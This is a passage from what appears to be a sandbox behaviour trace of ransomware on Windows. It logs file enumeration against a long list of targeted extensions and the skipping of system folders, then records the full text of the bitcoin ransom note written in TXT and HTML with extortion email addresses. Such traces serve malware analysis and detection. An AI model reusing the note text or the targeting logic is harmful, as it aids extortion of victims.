g.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0171.987] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0171.987] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0171.987] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0171.987] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\"
	[0171.988] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml"
	[0171.988] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0171.988] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.988] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0171.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.988] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.988] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"
	[0171.989] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml") returned 109
	[0171.989] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.989] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0171.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.990] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0171.990] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0171.990] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 1
	[0171.990] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 0
	[0171.991] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime"
	[0171.991] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*"
	[0171.991] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.991] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.991] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0171.992] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.998] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.998] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.001] CloseHandle (hObject=0x39c) returned 1
	[0172.001] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.002] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0172.004] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.004] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.005] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.005] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.005] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0172.005] CloseHandle (hObject=0x39c) returned 1
	[0172.006] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.006] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.006] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.006] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0172.006] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.007] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.007] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0172.011] CloseHandle (hObject=0x39c) returned 1
	[0172.012] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.012] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.013] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0172.014] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.015] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.015] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.015] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.015] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0172.015] CloseHandle (hObject=0x39c) returned 1
	[0172.016] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x800cf7ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb9270
	[0172.016] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*") returned 97
	[0172.016] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.016] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*") returned 0x61
	[0172.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0172.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0172.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0172.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0172.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0172.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0172.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0172.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
